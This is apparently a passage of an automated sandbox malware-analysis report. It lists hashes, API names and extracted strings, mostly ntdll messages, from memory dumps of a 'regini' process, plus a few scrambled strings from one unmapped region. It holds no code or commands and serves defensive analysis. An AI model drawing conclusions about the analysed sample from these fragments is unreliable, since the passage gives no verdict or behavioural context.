                                                                              • Opcode ID: c9153ae037909b6f397806d6158fb633aa5997c4b0e60c87a29d3b8384b18d73
                                                                              • Instruction ID: 96d1a1c599d53c97e0dfe6874f7b44e1021b388cb9f6d02a760cfda495cbc6de
                                                                              • Opcode Fuzzy Hash: c9153ae037909b6f397806d6158fb633aa5997c4b0e60c87a29d3b8384b18d73
                                                                              • Instruction Fuzzy Hash: 8851A6B6A00156BFDF21EB98889097EF7B8FF4820075481A9E969D7641D374EE50CBA0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: 4be3d6395045b88e7c4927ed1e28bb1d0c9170ec24e8a1d8d9331725f7d082e8
                                                                              • Instruction ID: c1f222ae55b2607017d4f3aea840c66a41384d9395c480a0481d051ceac78c6c
                                                                              • Opcode Fuzzy Hash: 4be3d6395045b88e7c4927ed1e28bb1d0c9170ec24e8a1d8d9331725f7d082e8
                                                                              • Instruction Fuzzy Hash: A1510975A00645AFDF70DF5CC8A097FB7F9EB44200B4488E9EA96C7642D7B4EA44CB60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3756702610.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2e60000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %218$%8>3$/xfn$24<8$;;6x$bygw$effe$lw%!$mfny$wcye$xegf$yg
                                                                              • API String ID: 0-3778452520
                                                                              • Opcode ID: b8098ad5589fbc7e239b4a2717ba39d0daa2bfdd868c68bf2637d3505216b232
                                                                              • Instruction ID: f19a654f74f0982b21fed52b06e91d9da8822fb105015c0f876a4d4156601a57
                                                                              • Opcode Fuzzy Hash: b8098ad5589fbc7e239b4a2717ba39d0daa2bfdd868c68bf2637d3505216b232
                                                                              • Instruction Fuzzy Hash: 4A112570C54A4CDADB049F98E986AEDBB70FB05304FA49198D015AB296C7750A42CF86
                                                                              Strings
                                                                              • ExecuteOptions, xrefs: 02BB46A0
                                                                              • Execute=1, xrefs: 02BB4713
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 02BB4787
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02BB4655
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02BB46FC
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02BB4742
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02BB4725
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: 02048a763a309acbbdf7c022cce449f051a22b8ba106615746f46f8a41c5a412
                                                                              • Instruction ID: e1eda3d8c652daaeaa60cea9fd9f7a6b1a809fd5b2a8b6fb299033b9ec98684f
                                                                              • Opcode Fuzzy Hash: 02048a763a309acbbdf7c022cce449f051a22b8ba106615746f46f8a41c5a412
                                                                              • Instruction Fuzzy Hash: 2B510831A002197BEF11AAA8DC99FF9B3B9EF04304F1404E9E519AB191EF71EA45DF50
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction ID: ac67ed4b4784353e8dc10e34f779ef774e5faccebbf688385c49a2d18efd74ad
                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction Fuzzy Hash: 8E81B074E052499FDF24AE78C8917FEBBB2EF4531CF18429AD869E7291C734A840CB54
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$[$]:%u
                                                                              • API String ID: 48624451-2819853543
                                                                              • Opcode ID: 95f1b9575c7e1604c1a25730fdf84d0cf0a4097653237cdf399f091050213d96
                                                                              • Instruction ID: 74c7d4624ef7ab1d8b626f41ceef4a58c4b753c98c91245bbf11cb4a35f25641
                                                                              • Opcode Fuzzy Hash: 95f1b9575c7e1604c1a25730fdf84d0cf0a4097653237cdf399f091050213d96
                                                                              • Instruction Fuzzy Hash: 10215E76A00119ABDB50EE69C841AEFBBF9EF44744F4401A6EE05E3200EB30DA558BA5
                                                                              Strings
                                                                              • RTL: Re-Waiting, xrefs: 02BB031E
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02BB02E7
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02BB02BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                              • API String ID: 0-2474120054
                                                                              • Opcode ID: 02843d35d8cbd5d615d865f846f57e336577fdd69f29e5be6492f84884dbf271
                                                                              • Instruction ID: 5816b6315d148b5f070a016bdc3ae74ee2c8c20eb65598171214280f9c20fa5b
                                                                              • Opcode Fuzzy Hash: 02843d35d8cbd5d615d865f846f57e336577fdd69f29e5be6492f84884dbf271
                                                                              • Instruction Fuzzy Hash: 12E1AC306087419FD725DF28D888B7AB7E1FF88314F144AA9F5A68B6E0D778D844CB42
                                                                              Strings
                                                                              • RTL: Resource at %p, xrefs: 02BB7B8E
                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02BB7B7F
                                                                              • RTL: Re-Waiting, xrefs: 02BB7BAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 0-871070163
                                                                              • Opcode ID: 008af1dc9548cf34d9e75157db35e48a1e3d1faa8c4d65708b4980da00a4c901
                                                                              • Instruction ID: e2ba3d478d8303eae4e6ef77674a95815ad78f34e2579bdf0823a97e003db715
                                                                              • Opcode Fuzzy Hash: 008af1dc9548cf34d9e75157db35e48a1e3d1faa8c4d65708b4980da00a4c901
                                                                              • Instruction Fuzzy Hash: E54107313047029FD721DE25C850B6AB7E6EF88714F100A9DF9AADB680DB71E505CF91
                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02BB728C
                                                                              Strings
                                                                              • RTL: Resource at %p, xrefs: 02BB72A3
                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02BB7294
                                                                              • RTL: Re-Waiting, xrefs: 02BB72C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                              • API String ID: 885266447-605551621
                                                                              • Opcode ID: 20feed97cb0fd645253d3b6659bee2ac5261e3a0008d4f83c2a93c7ebad686ea
                                                                              • Instruction ID: cbc29695d48106dfdee5c4acba9af78f5a7f63c5c7c066535b0c4e4b2b4b9164
                                                                              • Opcode Fuzzy Hash: 20feed97cb0fd645253d3b6659bee2ac5261e3a0008d4f83c2a93c7ebad686ea
                                                                              • Instruction Fuzzy Hash: B441F432A00206AFDB11DE24CC41BA6B7A5FF95714F1406A9F9A5EB240DB71E846DBD0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$]:%u
                                                                              • API String ID: 48624451-3050659472
                                                                              • Opcode ID: bcb6c455056ca0b7f599d4e7e77feef353ba8b3e2f2b58369a209559688e15fa
                                                                              • Instruction ID: f5020b8ab571942442f3e9c05516c42278521fca87988711b8997e10b33ebfba
                                                                              • Opcode Fuzzy Hash: bcb6c455056ca0b7f599d4e7e77feef353ba8b3e2f2b58369a209559688e15fa
                                                                              • Instruction Fuzzy Hash: 1D316472A006199FDB60DE29CC51BEEB7F9EB44714F4445D6ED49E3240EB30EA488FA0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-
                                                                              • API String ID: 1302938615-2137968064
                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction ID: fd52191c5b564b3dd3a145534bfc3e86c3bc7289a94bef31ba2791cc9e161ac1
                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                              • Instruction Fuzzy Hash: F491B779E0025A9BDB24FE59C8806BEF7A5EF44328F74459AE85DEB2C0DF309940DB50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$@
                                                                              • API String ID: 0-1194432280
                                                                              • Opcode ID: fba1861a7ca0504ee2934272dac586a943153884c3aedfe1d517bd1712dc9974
                                                                              • Instruction ID: 9dbc91c40104dc34502e4addcb920070b26696c8e143731759335a7872403d3b
                                                                              • Opcode Fuzzy Hash: fba1861a7ca0504ee2934272dac586a943153884c3aedfe1d517bd1712dc9974
                                                                              • Instruction Fuzzy Hash: 06812A72D006699BDB21DF54CC54BEEB7B8AF08714F0046EAEA09B7240D7709E84DFA0
                                                                              APIs
                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 02BCCFBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmp
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: CallFilterFunc@8
                                                                              • String ID: @$@4rw@4rw
                                                                              • API String ID: 4062629308-2979693914
                                                                              • Opcode ID: 43b99494afa693f91b9efcae0f2f54e23bf733103529c7fa6058f0ad0266e619
                                                                              • Instruction ID: bc41a45fbfc399e7e36d57af44bdce4ff319d15e8c73d69ef6dbfc085e52f989
                                                                              • Opcode Fuzzy Hash: 43b99494afa693f91b9efcae0f2f54e23bf733103529c7fa6058f0ad0266e619
                                                                              • Instruction Fuzzy Hash: 0E41BD75900265DFDB21EFA9C840AAEBBB9EF45B14F2045BEE905DB250E734C801CBA4